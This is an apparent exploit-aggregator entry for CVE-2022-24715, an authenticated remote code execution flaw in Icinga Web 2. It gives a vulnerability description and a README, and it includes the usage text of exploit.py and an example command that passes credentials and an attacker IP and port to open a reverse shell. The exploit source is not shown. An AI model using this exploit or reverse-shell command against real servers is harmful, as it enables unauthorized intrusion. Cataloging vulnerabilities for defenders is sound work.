CVE-2022-24715 PoC — Icinga Web 2 路径遍历漏洞

Source

https://github.com/cxdxnt/CVE-2022-24715

Associated Vulnerability

Title:Icinga Web 2 路径遍历漏洞 (CVE-2022-24715)
Description:Icinga Web 2是一个应用软件。Icinga Web 2是Icinga Project开发的下一代开源监控 Web 界面、框架和命令行界面，支持 Icinga 2、Icinga Core 和任何其他兼容 IDO 数据库的监控后端。 Icinga Web 2 存在路径遍历漏洞，该漏洞源于经过身份验证的Icinga Web 2用户可以访问配置，可以在非预期目录中创建 SSH 资源文件，从而导致执行任意代码。

Description

Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10

Readme

Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10

# Remote command execution 

[![asciicast](https://asciinema.org/a/595672.png)](https://asciinema.org/a/595672)

# Reverse shell

[![asciicast](https://asciinema.org/a/595675.png)](https://asciinema.org/a/595675)

# Usage
```
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT

Welcome.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Insert URL http://ip_victima
  -U USER, --user USER  Insert user -U user
  -P PASSWORD, --password PASSWORD
                        Insert password -P password
  -i IP, --ip IP        Insert IP_ATTACK -i IP
  -p PORT, --port PORT  Insert PORT_ATTACK -p PORT

```

# example
```
python3 exploit.py -u http://localhost -U admin  -P admin123 -i 192.168.1.1 -p 443
```

File Snapshot


 [4.0K]  /data/pocs/fe70627829399f66ae98e9b9cae1b9a160f0a21d
├── [6.7K]  exploit.py
└── [ 829]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!